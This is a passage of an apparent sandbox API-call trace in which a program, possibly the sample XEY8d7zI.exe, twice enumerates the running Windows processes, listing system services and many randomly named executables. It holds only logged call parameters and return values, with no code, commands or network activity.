dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.367] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.367] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.368] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.369] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.370] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.374] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.375] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.378] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.440] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.441] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.444] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.445] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.447] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.448] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.458] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.459] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.460] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.462] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.463] CloseHandle (hObject=0xc4) returned 1 [0109.463] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0109.469] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.543] 